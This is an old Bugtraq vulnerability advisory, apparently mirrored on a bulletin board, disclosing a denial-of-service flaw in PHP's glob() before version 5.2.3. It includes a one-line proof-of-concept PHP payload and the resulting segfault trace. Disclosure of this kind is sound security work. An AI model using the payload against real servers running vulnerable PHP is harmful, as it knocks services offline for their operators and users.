PHP < 5.2.3 glob() denial of service

看板Bugtraq作者時間18年前 (2007/09/06 03:45), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/2 (看更多)
Application: PHP < 5.2.3 Web Site: http://php.net Platform: unix Bug: denial of service fonction: glob() special condition:default php memory-limit value =========== 1) Introduction 2) Bug 3) Proof of concept 4) greets 5) Credits =========== 1) Introduction =========== "PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML." ====== 2) Bug ====== glob() is vulnerable to a denial of service ===== 3)Proof of concept ===== Proof of concept example : <?php glob(str_repeat("A", 9638013)); ?> result: (gdb) run ./3.php Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1215031616 (LWP 11156)] 0xb79d3a5a in globfree () from /lib/tls/i686/cmov/libc.so.6 ======== 4)Greets ======== Ivanlef0u,Deimos,benji,soh ,and everyones on worldnet: #futurezone & #nibbles ===== 5)Credits ===== Laurent gaffie contact : laurent.gaffie@gmail.com stay tuned, site comming soon ....
文章代碼(AID): #16tmTl00 (Bugtraq)
文章代碼(AID): #16tmTl00 (Bugtraq)